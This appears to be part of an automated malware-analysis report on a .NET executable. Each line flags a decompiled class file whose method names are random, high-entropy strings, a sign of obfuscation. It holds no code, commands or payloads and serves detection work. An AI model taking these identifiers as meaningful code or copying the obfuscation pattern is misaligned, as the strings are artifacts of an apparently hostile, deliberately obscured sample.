Source: B9exXW7c3t.exe, cl4GdKIzCmJ1bb2i6as.cs	High entropy of concatenated method names: 'w4XBKmyn3l', 'kjtBRmY0PX', 'bJeBgYxl1n', 'uDdoJWYith9rXGnylKV', 'dbCoyZY9DbUKtMsO3Pt', 'ABfg7nYSIFZQNvH0tPf', 'fZe6tYYqSbqGBmDN8NR', 'qIffZdYTGDtTxQa2RbZ', 'ymplHQYB6ZRNtynMLod', 'bC0ynYYKOuq14eOEjbt'
Source: B9exXW7c3t.exe, bJs7FMymEvuELRtULT1.cs	High entropy of concatenated method names: '_93E', '_7WJ', '_855', 'B28', 'tyBFJ8QkxXvfQSXQ3Ja', 'YpMKw0QMQ3oWnA3ecQR', 'JDJPZBQ4w4uu7rFGPpa', 'E50ErIQb2KseUZWMHXJ', 'a5fJVHQfVgYXIr9FYjk', 'HrDgsbQSiRSUbHFAnNW'
Source: B9exXW7c3t.exe, Irsi3taJEBGkmWkCXdh.cs	High entropy of concatenated method names: '_56e', '_248', '_86A', 'vj4', 'W5n', 'kuom1Dq3tS', 'nWNmipHCHE', 'a6B', 'Khk', 'H1w'
Source: B9exXW7c3t.exe, cLoGymDxDf7lJry8cWv.cs	High entropy of concatenated method names: 'lf8dxXbjsgbmhKA3NSK', 'PmH4ovbhEyi948siBLu', 'dJnSf7buoddbhpnrpiT', 'qZijnSbOvG70i6cgbfq', 'Aa26uFqIS9', '_71i', '_951', 'zR76EkjeRc', 'TH76VnB4LI', 'TVR6vbsHCZ'
Source: B9exXW7c3t.exe, XWjuu0aGWVmnaZjYe5W.cs	High entropy of concatenated method names: 'EwTFEF1NNT', 'SiwFV1BXkn', 'WMNFvtyoOD', 'zGpF28XAYr', 'xCjFwbASfj', 'iPdU40NX2B8DuZAcOCl', 'MCrCQ1NtKLYEOuESNT9', 'ES3jphNDQRexYr2iAbS', 'KbEuv5N7MBSLhe4Nh5Y', 'hVCdTvNo43h1EUYEkJR'
Source: B9exXW7c3t.exe, c5kjUoQIymZVsKiuE0q.cs	High entropy of concatenated method names: 'GvSbXFRatS4DM9h46uM', 'O7s9w2RH4a24JO2kJ4l', 'UO0GDbRNP6rtH6kEDZQ', 'wuLGuhRVpglWGaXsX9m', 'wPH7C3kxxE', 'BKIHJWRCWABb2SQKo1T', 'zBpqBfRR5XdPc1WnXd1', 'q3DCI2RlwR2NVP2yS3o', 'Y6e4NURp6shJZMD6G6j', 'tqqs56RxqTj47DCjBiU'
Source: B9exXW7c3t.exe, qqi13PapPyHclZGgrwT.cs	High entropy of concatenated method names: 'jC6Gxt4eRt', 'PoVGuehvMw', 'hSdGEmi6R5', 'csuGVZZYWY', 'iUqGvPHLcn', 'WZSwImNMoSOmQ2p6l7P', 'd8VM6UN46eRlDNj8qs5', 'WNEs5rNv4EqwNemOnSV', 'fyiIQRNkTlR6ZJ4SHVY', 'dJDV2hNbWPYsEkrqcSu'
Source: B9exXW7c3t.exe, FVLSPtISgSIRiFJcZxa.cs	High entropy of concatenated method names: '_348', '_55c', 'F36', 'Ogfd7FQc0w', 'iMUdBCdPRl', 'RUpdtQFpjf41B7YbWMI', 'kpBs4yFCQtbnWqUXg1x', 'UnRaPsFR1All5qk1i0I', 'bXjxkcFxvpAAFxMnQKv', 'r9Go7gF8Zterd5w8aQ1'
Source: B9exXW7c3t.exe, Cd6UEFeeuWsEEh0VX0i.cs	High entropy of concatenated method names: 't6AeYdG37b', 'S8peSDPG78', 'o4DeJ2EJ2T', 'EkZefH3OAK', 'xXWennr7hm', 'UuheAIp8wE', 'iZgZTXL1jXr4BcN9ARC', 'WEOLJ5LGH7s5URTwubB', 'WOdoKKLwE7HtVxpm4Lq', 'CTfS0nL56WdQ4dT3akh'
Source: B9exXW7c3t.exe, YWjGtKDeItRQVlR0V7c.cs	High entropy of concatenated method names: 'YgZqcnM5qw', 'VNoqXUBJ4a', '_431', 'no9qBtdm0X', 'y9pqH6a7R5', 'EAwqFNj1Fm', 'n4bqGMwYdA', 'wyMOxrkUUpaJogIvas9', 'e0YO4Gk6Nwli6HplfxM', 'lT24OqkdSpdre4D65vV'
Source: B9exXW7c3t.exe, aC7hJ2IGnRpUcdYMfiU.cs	High entropy of concatenated method names: '_8o8', 'v0bP58U6rqMq7pwBDSK', 'TDVherUdAcOoTsdKoOS', 'n9JhHNUFJxXqfFSr2cH', 'O5RXqdUYimZjTResWnw', 'sJn973Uc2tOFgG95Crl', 'YeyWyxUNry3xSGFuq6x', 'tSNmJtUVr2ya3F5Ut2D', 'JTylITUaR0Bj85QUf76', 'Cjh9o1UHRc9o07LaWNu'
Source: B9exXW7c3t.exe, pNmNPgQWTjVOom8tRcw.cs	High entropy of concatenated method names: 'iwrCn6YiZE', 'PRkCA7bMoI', 'i4gCNMwPwg', 'j0yCtKXsk3', 'F7MC9yu6ro', 'brkCd40rPb', 'Y5IiI1EJYTkVApwcrX4', 'S5N0IWEKHOFeGHx4ryx', 'f7QhpkEsFp36Ec2N6WJ', 'pkbbtiEnELoYkjKMUR1'
Source: B9exXW7c3t.exe, hWnHtXI4LI2kEcrqCir.cs	High entropy of concatenated method names: 'MvnX1WOUOq', 'o13XiPPyHc', 'PZGXLgrwTw', 'R2M6466ToXs8KF1eSs6', 'Vf1QLg6i1DSOvJ7Tfi2', 'uIrblf69FkDOS4NnKX6', 'oFhW016B3VW5qNlqPKh', 'DVRXDF7GnD', 'XBbXswyrS7', 'UjuXcE5iTB'
Source: B9exXW7c3t.exe, QUKtDHt2LD6YEf1Lva.cs	High entropy of concatenated method names: '_1h5', '_7WJ', 'TyQ', 'B28', 'Xuso0ftSvsvfP5LxSGJ', 'FnVAhytqdIDAcmZO89L', 'sE3Zq8ti4x8VlssJAgv', 'RjfhCkt92mhtmGK8UN4', 't7BEnKtTRP45cAvmpkO', 'TKjcaTtBeB1fHsdJ8Kl'
Source: B9exXW7c3t.exe, fQd2mte5qAoIyrMUPV9.cs	High entropy of concatenated method names: 'gqvapUJtoJ', 'aegaTy15q2', 'JRwa50YdRB', 'zQAa0vNRTT', 'x6PaCks8tj', 'KCaV1dgol3i9N7Tpc5H', 'cI8k8fgQBlZJoiM3eiN', 'Gi1HxmgXScG8jFJ6SJ5', 'LRWixLgt0F6l4C1fNBM', 'JkcDGcgugN5fEtZQkx8'
Source: B9exXW7c3t.exe, Hktwv5yPrEU6jJsEnoD.cs	High entropy of concatenated method names: 'QrHe5GJATE', 'dP2e0KrOMF', 'PoDeChSUWy', 'FZgIkKII1B4cyBkeI0U', 'VZq9sRIjU1tU0PcIaNg', 'nyTOp8IhOtowRw1D7ON', 'YHsmtEILarJWxoFwhdJ', 'pK7owIIAm1VwSEaqgTW', 'HPNiSXI2pZFOdUcKsPm', 'XSvf89I0E2NCu5ME4eM'
Source: B9exXW7c3t.exe, J2m2lwwSyRb6XKuvx3.cs	High entropy of concatenated method names: '_8k1', '_7WJ', 'B73', 'B28', 'DUremy7nmWUTtwcqf1o', 'vDKcHl7yLvf2ss7AiMJ', 'PlGE4173bFbWSCqJfc8', 'YQpes47maUW3uguJ7Vo', 'sIfcol7zZHj2pol0odQ', 'KXoTiyXPnOOubqKBrhM'
Source: B9exXW7c3t.exe, xTZqH8D6vqo2Pm2D1ZN.cs	High entropy of concatenated method names: '_518', 'E6y', '_17E', '_79s', 'XCq', 'vm2', '_5yr', 'dlO', 'Q7M', '_59C'
Source: B9exXW7c3t.exe, BaddaJvL1MaIr3usK0.cs	High entropy of concatenated method names: 'a4d', '_7WJ', 'Lq4', 'B28', 'uV84JR7Z6toXkb2Ybke', 'XyNwGs7EMLarQtFB7dn', 'MyXsVl7rr5JrcOZAYyK', 'Lp2Rx27vIDnR3AooiiL', 'wqcUbr7kO8GeZTLe2B2', 'WDcbe27MRKf8umuEbyf'
Source: B9exXW7c3t.exe, Ox0AD3sJiSZqX8g01I.cs	High entropy of concatenated method names: 'wADk3JiSZ', 'D7xHDiR6so9sgPtaLv', 'YVEUjdpXGjLvSHNviN', 'gcfJZECqpL19BgroVg', 'DSE5fIxjWVdxxkY0q7', 'qfgJt98HkPnPTmuNhp', 'BHXerKqmk', 'EYhIdRp5O', 'UOhaVXE1Z', 'WP5Q7wQBu'
Source: B9exXW7c3t.exe, nHQSHvevmwHhx9mIvAU.cs	High entropy of concatenated method names: '_0023Nn', 'Dispose', 'wL8Qu6F6rV', 'NguQEw1HQS', 'jvmQVwHhx9', 'mIvQvAUsJk', 'DArQ2NUPAm', 'L3LF1Dw2hI33eaB6jW6', 'dQhRTgw0OXGbjkE9C6A', 'p9g71twLrHGCk5f2hFq'
Source: B9exXW7c3t.exe, kLD7gXMi8thSuYwpdl.cs	High entropy of concatenated method names: 'sd4', '_7WJ', '_2zX', 'B28', 'iyrPGHXwiRYSndM56At', 'NLHpeYX5RqZKj4pwMgK', 'BlGLesX1gdC6dfilHMA', 'C9tQ2IXGd48bNvynfmE', 'yooOcLXU7umsWFxbxLK', 'X8GDrDX6VFWmJj4lt3v'
Source: B9exXW7c3t.exe, Y8W3JkerfmFu1UanPJB.cs	High entropy of concatenated method names: 'Usae8Tj4go', 'xBweqgZkXd', 'PaZe6ADdWj', 'OUeXbqIxXVI4HIIZjUg', 'QaU3L5I8c0xRSq7aIVw', 'sW2L3DIZcmltBKmVCMY', 'mqdBS4IEYuX67LZdqNr', 'btkS8LIrdSEvJh2WTvY', 'yL6iI9Iv00pu6uobBfC', 'DARpj8ICcs4Oc9YhD8K'
Source: B9exXW7c3t.exe, L2Xg14eRMRYHA21WiuF.cs	High entropy of concatenated method names: 'F6oadfiEup', 'fK3aPRoC4b', 'b65azRnuY7', 's8tQr0dcRu', 'fK2QyAxpja', 'I45QeE3D8l', 'QJpQITEHru', 'XxEQalIGca', 'TwjQQ0DQd2', 'xKRgR1ePUpNHk1KFvkq'
Source: B9exXW7c3t.exe, GYVwLga6vupAmJtdDLh.cs	High entropy of concatenated method names: 'fgCkxhdqSN', 'W82kuxQSrl', 'l3fkEscvRm', 'dqxkVe19In', 'D4Gkvif5F1', 'Fv71LtVYKoSFyUyP3R0', 'QiibhDVdSxfp9nlIv7H', 'ISfpxfVFOc7m7dMOiAJ', 'IM1HvkVc3GGDl0lOCrR', 'n903NpVNTOvvshrK6KT'
Source: B9exXW7c3t.exe, HxiJNeDrMF3JhcnBaNt.cs	High entropy of concatenated method names: 'pxw8hWmuZp', 'eTQ8lidkvD', 'MC28Yv8BuK', 'bGV8SmMyEs', 'irj8JTB5V3', 'BF48fIiCSr', '_613', 'IO3', 'Mp1', '_7FY'
Source: B9exXW7c3t.exe, NNtyoOQPD6Gp8XAYr8C.cs	High entropy of concatenated method names: 'qdl8KSB16Y', 'UHw8Ri8mZk', 'OOt', '_8Md', 'qrX', '_1N5', 'x8o', 'ppe8gS8YLG', '_2m4', 'v4c'
Source: B9exXW7c3t.exe, jI5vyBAlfcvGDysXIX.cs	High entropy of concatenated method names: '_321', '_7WJ', '_726', 'B28', 'O7DZEHtHXqrJtMXpQCv', 'ujJgwQtl8ot4QeNnkKo', 'vo5yf1tpxXV5meknxAT', 'wOprSotCi4mbga9wEc3', 'nEILsbtRD7loEkeR7h1', 'Qss76HtxGrj3LU4sQJ9'
Source: B9exXW7c3t.exe, u2YAlQeLSjLIXFoaTjB.cs	High entropy of concatenated method names: 'SIxIdyFaVg', 'xqJIPbgQGE', 'gXpgBl2YUvM3eUEvgOH', 'zyeUJp2cuXwGQ0XuVvW', 'nZhpv22NVSCxFOGdJXv', 'dTTUP72VKROrUkNXNQm', 'FSxPHc2apbnuNRvgVan', 'hw59vx2HGDaaUEBYEVf', 'Rpbr9j2lDFJlxDJbdnD', 'ooI2kl2p12Fi5Y0k7fd'
Source: B9exXW7c3t.exe, Wpjnb3ePhoMD6WO4cag.cs	High entropy of concatenated method names: 'qREs8xDu4h', 'XohyH15yHytr7kQ2tsF', 'wFnlnw5JsKj65BZHZDS', 'NGl5Uu5nGV5Cn2ko7tV', 'M2y5Xy53eZrjsVloM3H', 'IFy5I15mhFQONf6y4Cg', 'me3sUP2yFS', 'c7Ls4toTv9', 'WmAs7R7IMp', 'BVLsp0sZm4'
Source: B9exXW7c3t.exe, o2sSdQoawP3CfXP4Ec.cs	High entropy of concatenated method names: 'j37', '_7WJ', 'm1w', 'B28', 'mBBwpQWu5', 'x2IgqsD1M8CkYITsUaV', 'wwUVgNDGjNi3rB1PThc', 'dsyEmeDU81sX8alryu3', 'V473hsD6RNvZytIo4vO', 'nJf6SCDdDswI2MtrRJl'
Source: B9exXW7c3t.exe, emt9afyRI4hw8olZXyv.cs	High entropy of concatenated method names: '_84K', '_7WJ', 'dM7', 'B28', 'oSC2mhOE5088lkhi0ob', 'DtWIqmOrKJmvA2OWOyN', 'X0LycuOvcmWxUNBpZ7O', 'ph4aI0OkaKQFbSS3dp0', 'PXdImIOMyFouXK8VYL6', 'yYtmd3O4LtGTbs06JAn'
Source: B9exXW7c3t.exe, oqs2qqIT0kOMHOq3aHV.cs	High entropy of concatenated method names: 'qTn', 'rMM', '_561', 'P7I', '_6pi', 'VqM', 'IoolYHd5fTgyOSsCy66', 'RhVAKRd1X8Z7rd7Sdct', 'IoL8A0dGZslruZA2u66', 'wXSNjCdU2IudeQGmid8'
Source: B9exXW7c3t.exe, M65ev3IC9aQdwn6o6NP.cs	High entropy of concatenated method names: 'mCiXW77oMs', 'ct9Xx1r2rV', 'FxjnMUdFARdbCPYED1P', 'Vj4Ot8dY0NrOawrhQ9x', 'TkhS0ud69YqU8FQQMKQ', 'B2B0fEdd7VudoHagcuP', 'briXFOdckOMCYNaXKVu', 'c1by5PdNkqSLeHtQZnx'
Source: B9exXW7c3t.exe, iMCfIqQX3VfZOwARpue.cs	High entropy of concatenated method names: 'qU3C7vOBF5', 'TyNCp7EspK', 'HL61aBZzLeUvo6i5dbq', 'B9SwXpEPgIZSo17pB4F', 'xh5VJFEWAD5dpHBAg74', 'eOYyTFEDCI4d6jBAC26', 'YB1DjFE7cfwH3DIb1Y8', 'yuK7X7EXjQNkaKtHcsY', 'U5ekuYEt49luArriBwB', 'S2epsJEojeD18BioBNR'
Source: B9exXW7c3t.exe, HRF7GnaLD9BbwyrS7Nj.cs	High entropy of concatenated method names: 'DeVGabB576', 'AlgGQlGPun', 'l9nGDbK6NB', 'QVH6OxN6BrpQj2q7fwb', 'VVH6FKNdw5nnlWllLxn', 'aQYFgkNGuaYXjJ6Ufp1', 'BlUwJyNU9BuiFAhKLY8', 'xTlbGfNFPO9Z0jmqQuA', 'hun5nhNYEWIaTieaFmJ', 'dC64R4Nc38AGOSGVWTw'
Source: B9exXW7c3t.exe, QNSbbaIlR4QnVnS0rJ2.cs	High entropy of concatenated method names: '_2P7', '_79b', '_16R', 'kB8Ba6Thmu', 'xmQd5G2uwY', 'QfPrx9F56hucgSJtFrt', 'F8J9YRF1MKoVfsU6QmH', 'PPX4OpFGwPxuSf8VX5V', 'eROMiWFUwxgAhnCn4v4', 'YbZsdnF6I4f7qhL11Gq'
Source: B9exXW7c3t.exe, NW21UUjmtLQf4rl7c5.cs	High entropy of concatenated method names: 'iW5', '_7WJ', '_5CE', 'B28', 'w8FPe9XhIYpg0qwPbnT', 'gRIcdsXIPxhtefni73M', 'trFcv1XLVR22TIPQ3Pq', 'Ln3OZMXAOVKR3s5Np04', 'jtm7kxX29u4qk47cqkK', 'POS7sJX0dkYTD9iyv32'
Source: B9exXW7c3t.exe, tGEHOreX6Fv3rwi0J5r.cs	High entropy of concatenated method names: 'GyvIWXhX86', 'K06Ixuu3OP', 'T2LIu9XxPk', 'roMIEn89mD', 'AIJIVq4lad', 'UrXIvKCS6p', 'YyEI26MSI5', 'bnypOsAH3O82OwfEhB7', 'zEnQQ0AVvNtUSZUeZTh', 'IS7fo2AaZkcLANPWJln'
Source: B9exXW7c3t.exe, ydAeaJeuCJSwTqDxMMr.cs	High entropy of concatenated method names: 'QqdQgAeaJC', 'aBKwvmw7a8uhGuc1wTu', 'jMXOoGwXeMX0kjSaot9', 'eSDTT2wW2M48H71Zddh', 'PESFJEwDh5hJShautXe', 'oZsd1Nwt1feYIqAe64g', 'xbvbe1woCcaTTuMAmm2', 'HdIyZfwQ3e5QSFvBJcY', 'nEOrISwu1dlBZq5t4eY', 'J8HuoQwOuhMPHp2ZX6v'
Source: B9exXW7c3t.exe, bRbjkEIyLwYoEGFoNHx.cs	High entropy of concatenated method names: 'm6Psgu6kD2', 'caJsbtbRv7', 'BAtsoYGtrL', 'BV3sWq97Pp', 'VmUc0C1tfSFi3mq7nia', 'GvsYg4175xfClXxfjOy', 'Yh4U7O1XpkUBtSC2GL6', 'Ix2pCg1otxXC24WAH2M', 'noCQZk1Q2gii0yTo0vv', 'XvIYge1uv1byIUpsAJH'
Source: B9exXW7c3t.exe, LQ1cuMyQlYJeb0Pubge.cs	High entropy of concatenated method names: 'tvS', '_7WJ', '_769', 'B28', 'm9JOXkoqvnlJA4IHvqG', 'DfnGsooil70vcVr6yp0', 'VeTlIXo9Bw86DFRxn9C', 'wZLT63oTyThhbIS7apJ', 'co2LRsoBqgWo4EkgjGj', 'EvZ4xAoKYdtQmE5tkIG'
Source: B9exXW7c3t.exe, H2NqPlaALvjetFSsHgw.cs	High entropy of concatenated method names: 'rUDmdffEny', 'HqSmuMMIN5', 'DKJmEG1GqM', 'eYpmVTIELM', 'xA1mvhho2V', 'TWLm2GOHAl', 'V9RmwA5HqB', 'x8PmZxy7im', 'uB7mjedu9W', 'v8Wm3G5vhJ'
Source: B9exXW7c3t.exe, SjrWA6sHCRDPNvFuoDq.cs	High entropy of concatenated method names: 'xgZpEjmm5ytVI', 'aWwkbpSGgFJEGnJYWNf', 'AAKZ2ySUfVHRMdW9PDe', 'uKlievS6RO7eVWiE1oG', 'njxDOxSd0QcMeeJY2iu', 'BVB2O1SFHb8o1PPtXmT', 'FeHbHcS59eVxWxojUFe', 'XAITx5S1RHuG5VExFFT', 'RIThQCSY27BPZ0L0FRU', 'nqyGfGScc04K8nJfj6X'
Source: B9exXW7c3t.exe, P1DVsSylkqfKyqtQM6r.cs	High entropy of concatenated method names: 'kcheHQ2gWJ', 'QyFeFZ7BlS', 'Ragw4GhL3B7uKBXPdFh', 'atgb2Vhh9vGUElUhcBW', 'S5RB50hIteTq1ByUqvB', 'iIufN2hAfFuSEnrBMxh', 'Ulx8CYh2al4FfvivvUG', 'aXbV8uh0y1VcuRqiBme', 'LqZvBMhgKieubw7GMuO', 'A1jXR6heVjJhDZLrd46'
Source: B9exXW7c3t.exe, lNNMg3IOSMFG1d80G43.cs	High entropy of concatenated method names: 'AY4cnkgigw', 'CJtcA3k5N6', 'Cf5cNeO8PZ', 'R6qctFdWju', 'G0Wc9VmnaZ', 'sokU156hFeJ0nTFG15U', 'CW8dbm6IsbmQaT3GMjA', 'AuTK3X6O3UkrT6YxFoI', 'OCB7Ap6jKiOlC1D6EBG', 'LrwNyp6LmLbKR92HUL9'
Source: B9exXW7c3t.exe, PDGHZND8mFHp0SMB5DS.cs	High entropy of concatenated method names: '_9Xh', 'pA2', '_5v5', '_4m5', '_1I6', 'ynJ', '_15m', 'V8n', '_753', 'c15'
Source: B9exXW7c3t.exe, LUyyUeDTWl9Pnwr6rcr.cs	High entropy of concatenated method names: 'UoLq7tw23D', 'K0sqpC7WZm', 'yOXqT1G2Dl', 'bx5q57IHJI', 'lybq0TVVTk', 'QTgMEFMDNZnuIL5ZsKK', 'I5nWDWM7lvyeted4xF5', 'bf8WMkMX7REwNPXilXM', 'h0Yv1GMt04hhGGAGZrQ', 'tI3r0uModmC02wKKNbj'
Source: B9exXW7c3t.exe, uEaP2KyXrOMFloDhSUW.cs	High entropy of concatenated method names: 'xwh', '_7WJ', '_4o3', 'B28', 'uqSRPFQuPeEDG2UH9GP', 'vQWgfqQOk5dn72vIwol', 'Oe6jHkQjWyIsfBltMnq', 'IFU6vNQhCkCFfH1uvul', 'NFPZThQIO2Fqq774S4v', 'hy7G8VQLVohEepVWIAK'
Source: B9exXW7c3t.exe, GGnLJlIMEmqAxn06L6B.cs	High entropy of concatenated method names: 'A9l', 'NpmdEDH9Z7', 'eYNBrsKuAE', 'eF7dWbxfQF', 'SrK5NBFD332fkgZEQwe', 'EZ8j02F7ZXe7G0pEd0S', 'NUAjquFXjFlm71uQ9Xh', 'QkkHbIFP2pnrq8UfntK', 'V6iAXHFWGdVqAIjVeiF', 'W7O1ZrFtZNhvIBXrndC'
Source: B9exXW7c3t.exe, obLgAoaQa1mZVb9gob8.cs	High entropy of concatenated method names: 'LiwFLonjIN', 'jqu1uecFu2mcAjefNK8', 'hYMcgAcYgClT46E0U8L', 'CK5CL3c6Ju9CtUf8SwU', 'vvMmOUcdV2J7A0A4jDm', 'vNuBbnk7PY', 'z7VBolyvu3', 'LBCBWmsDwp', 'za5BxZqbeW', 'fKeBu87x1i'
Source: B9exXW7c3t.exe, rYcCF5yblte7JXUtgWe.cs	High entropy of concatenated method names: 'EGjyhSx7Zd', 'ptHJYEj7uIZnZquXQc1', 'fUh2FWjXSdGKtakNs6d', 'ViTFDTjW71VMDBXgFqD', 'j8UTTVjDDIuTaG9MORt', 'tC4aROjtDsGOdiRRQj3', 'z8LD2hjoGG67T2n3v8W', 'JOPm6QjQs09myQlYAFq', 'RVDyYCvhLG', 'eMvYI6jjIs4cRq8dU9k'
Source: B9exXW7c3t.exe, N9EcvUySC7P4EU8iOfq.cs	High entropy of concatenated method names: 'J96', '_7WJ', '_95G', 'B28', 'nyYdnvh6Qi2kl3fjVJ2', 'Bu3ID0hdBWPp1kVeKTv', 'hWSmdAhFpaAy8mHGhXA', 'TvfiJvhYYfptm6dwEAw', 'IuZh1VhckwdQE9c9hvZ', 'qeOXXkhN5WRs38oHbcf'
Source: B9exXW7c3t.exe, Edw86gy63gYAyrGvpxg.cs	High entropy of concatenated method names: '_6L9', '_7WJ', '_5E1', 'B28', 'qvWvX0uzvI01qv3Qih7', 'uh6WkvOPVL3DTmT5XTs', 'cKQtCcOWbA4w6wv43M0', 'Tp71eKODCupTPKvA0fH', 'vZkNx4O7RLUeRuT6NGU', 'LMLxTOOXy36cX3PMPmj'
Source: B9exXW7c3t.exe, muSyoUaX54R1Y20mdxr.cs	High entropy of concatenated method names: '_912', 'SuF', '_451', 'BdL', '_782', 'gY9', 'q92', 'ZYw', '_35s', 'I83'
Source: B9exXW7c3t.exe, xWGOqHsklDSgxDT0Beu.cs	High entropy of concatenated method names: 'dNWMIYSCW330cVX3iTY', 'aki4MtSRJrIdx3QJ2yc', 'RYZxdwSlnQ0EhBcEv82', 'XannOnSp8V7xp2MIpLU', 'AP8omVBR7Q', 'bDcha3SZKX2qgi9RlJ3', 'SVP9gTSElPhrNInkRx4', 'vqI8uiSr8UJYojgdom6', 'fyGiM6Sv8NCE2Vosi9t', 'W76NoISkYvEcLF9Wjbe'
Source: B9exXW7c3t.exe, DtiTgFyIxqXYxYZuv20.cs	High entropy of concatenated method names: '_732', '_7WJ', '_1t4', 'B28', 'Gta4qhopkPGgXdA9ftA', 'bmCtjboCM3aKE8ooysB', 'y3NkkjoRRtDsj2EkAte', 'UXYwdeoxrWKy4vIr9r6', 'qVuMU2o8AO9E9arxOut', 'u108ploZcVCq0ysjpSJ'
Source: B9exXW7c3t.exe, tDPG78y4i4D2EJ2TWkZ.cs	High entropy of concatenated method names: 'rUmygtLQf4', 'xMyYO2u5Sj0yDd9Oxd2', 'u11MP3u1J44k4dkcAwY', 'JjbGU9ueL7edmolO5Ge', 'hKd5upuwiFATcB0ZAI5', 'JPbCXmuGa7FcbqnNjvi', 'SrRQyBuUTJQAbixo603', 'UnPx7Gu6hw2rK04IRl5', 'MjnXqvudK14d5sRbp6g', 'K9F'
Source: B9exXW7c3t.exe, E7ps5cyGGZrM4oZm6yI.cs	High entropy of concatenated method names: '_16M', '_7WJ', 'QAc', 'B28', 'UmZXKmQa1XA1yX22oT6', 'dLPnndQHSIh3HIk0nax', 'hbdnqIQlJF0Kabu4oVM', 'STCZMBQps1pA9laKATw', 'DcURMrQCIs5wysjBal5', 'mxbWcdQR1vwxTBDZwHH'
Source: B9exXW7c3t.exe, aW1bNQQN30CS4ddVWQA.cs	High entropy of concatenated method names: 'lG88aVWPNH', 'B8U8QJ80jJ', 'mX28DNQ2YD', 'GxU8sdiFbe', 'PP18cKl2d5', 'uv68XDA1Mn', 'fAg8BiH5l0', 'jJ48H8tvLx', 'guo8FA7IJA', 'm7n8GMOhkl'
Source: B9exXW7c3t.exe, TXQMkZEeOn8sG2PDwm.cs	High entropy of concatenated method names: '_9Qy', '_7WJ', 'M4k', 'B28', 'JF5VkDD3CS4hgeFa2Zv', 'NybQsJDm4bhMEoEL5qZ', 'Tn0O1iDzCB1CSd4Nc17', 'tEZNoj7PlTXBEr5cJ8e', 'DSipnl7Wi1qpiIODYsL', 'yeOQHC7Di4Ytdw5nABw'
Source: B9exXW7c3t.exe, ikSPYYs8vr4HMWVowDF.cs	High entropy of concatenated method names: 'O0uoCKXdpL', 'SfSo8dkiG9', 'eyGoqFo1VI', 'wNoo6s8gBu', 'xEGoKZ1ll8', 'IdFoR0O4DN', 'QbYogDMOTm', 'Kc3obY9IS0', 'cTtooa2H9N', 'TDyoWWUx23'
Source: B9exXW7c3t.exe, PZp7gHQ9SBRWkIU5CKY.cs	High entropy of concatenated method names: '_793', '_19i', 'j2m', 'Ow880NqYav', '_91O', '_7x6', 'F7G', 'ReP', 'cA7', 'ATW'
Source: B9exXW7c3t.exe, iYfojuqa2xvAOxpplj.cs	High entropy of concatenated method names: 'tDtuB66NE', 'IJCEDI7pb', 'kx9VwUNMq', 'KQLi3GWrfHWq4gPdtFE', 'HT1NbUWZqkpgtRJcqes', 'VocGaYWEr5LmsW8CB3T', 'P8JM7wWvPMMkwYOi94T', 'rjWqEwWkc4uPxHoqvkJ', 'Mb3a6IWM11VlkOlkav2', 'V1J4fLW4bqU0cRiqJkt'
Source: B9exXW7c3t.exe, kokqtBaCE9lpKbRsdxN.cs	High entropy of concatenated method names: '_79V', 'UnI', 's58', '_442', 'cLokrGymDf', 'Eca', 'slJkyry8cW', 'IQxkeDroyF', 'Y42', '_21Q'
Source: B9exXW7c3t.exe, nByJsIzUKxLWfeq7NX.cs	High entropy of concatenated method names: '_4W2', '_7WJ', '_6R7', 'B28', 'e99BRDoXs3GtRES0tpv', 'rvtVIPot1wWWm3qTsOr', 'TW3DlFoo05bjTLcMYK2', 'kL4wHsoQYImFci0Y2ZC', 'Jmv2TXouKEcO1Dud60n', 'h2G7G0oOYOZnNlw8r3s'
Source: B9exXW7c3t.exe, WUsxDaDDWMWmgguy1GH.cs	High entropy of concatenated method names: '_77s', 'iIQ', 'vN9', '_6c2', '_4d1', '_34n', 'Jx4', 'nkV', 'k4X', 'ZyP'
Source: B9exXW7c3t.exe, GrWWkBy8hijAf7vuVQl.cs	High entropy of concatenated method names: '_1I3', '_7WJ', 'Aa7', 'B28', 'Jtd4ZNui8RD8DbDjbj2', 'BL8vWFu97f0KRxRqSiF', 'pE6UB3uTXnoe9YS771M', 'eTU9OiuBtWp8etmt6AB', 'o980T2uKxSk6FAOCf1T', 'TqMSsLusPmFIkrcUkKo'
Source: B9exXW7c3t.exe, KGltI8yfmDksAvsFfIx.cs	High entropy of concatenated method names: '_13J', '_7WJ', 'G8c', 'B28', 'puUsBBhRDqGZVYHbG72', 'B3gNTxhx6PmT8oFEgG7', 'V75Cnvh8B5u3LP4ruhJ', 'CkwY7ShZR9RcfYiA9N3', 'iMCaT9hEvqFWnWYjabX', 'ii84udhrNVv5F8XlpF8'
Source: B9exXW7c3t.exe, fmrMctQbt1wdvYBqlLr.cs	High entropy of concatenated method names: 'K4WCYpZBGc', 'n9RCSDCk8q', 'kApCJVG7rM', 'uLwRqDEqkwu1lbfhpHa', 'EjeFmMEfPpkytKpKBQq', 'QLZQLcESIMl9fwp1h9k', 'hfmIAHEigjiHTDExwj3', 'o1GYOLE9iKXby57robg', 'hRYrZhETU6IG7M724Sb', 'I4abdWEBv4Br8xnguvX'
Source: B9exXW7c3t.exe, hI39OJytMsGNIxKkvji.cs	High entropy of concatenated method names: 'vDke4BVJYg', 'iTwJuxIQOd9LFVwno99', 'WWIF5iIuXN3tpbJ0HgK', 'WNaXrPItIJd4PxkHRUV', 'mSbUQ8IoSu6LTbVWIi2', 'L1655VIOu4mEGC8nCRa', 'W21', '_7WJ', '_294', 'B28'
Source: B9exXW7c3t.exe, pAP7KAaHKY4kgigwbJt.cs	High entropy of concatenated method names: 'Y54', 'Lc3', '_3f3', 'pt9', 'nBO', '_74N', '_777', 'oG5', 'Ry1', '_3bJ'
Source: B9exXW7c3t.exe, z5RnuYe7778t0dcRuDK.cs	High entropy of concatenated method names: 'UNuakP8W3J', 'lfmamFu1Ua', 'QcKAPC0loNhHh2N87LO', 'TPrgxL0p2Cj9vqwefa9', 'x7cs9M0aYFRWbrtiBGV', 'LrP6Xt0HjOXeTS7ER7K', 'Y8Njmg0CtJq649sDZif', 'QnY2pb0R8yql94lcdE4', 'M03bcT0xwdC1K9ffrIP', 'SKsGZD08KTuExhrfSBP'
Source: B9exXW7c3t.exe, YKk9IoDMTUZ9turHhk2.cs	High entropy of concatenated method names: 'K8a', '_117', 'tLpgXEJwar', 'tMogBaY124', 'HH7gHG6ybb', '_8x7', 'Irc', 'R21', 'B53', 'zP8'
Source: B9exXW7c3t.exe, IMwXSdD0mi6R5IsuZZY.cs	High entropy of concatenated method names: '_6u4', 'mQ9', 'dBfqCZZR13', '_639', '_132', '_775', 'OOV', 'F1i', 'M4T', '_7dM'
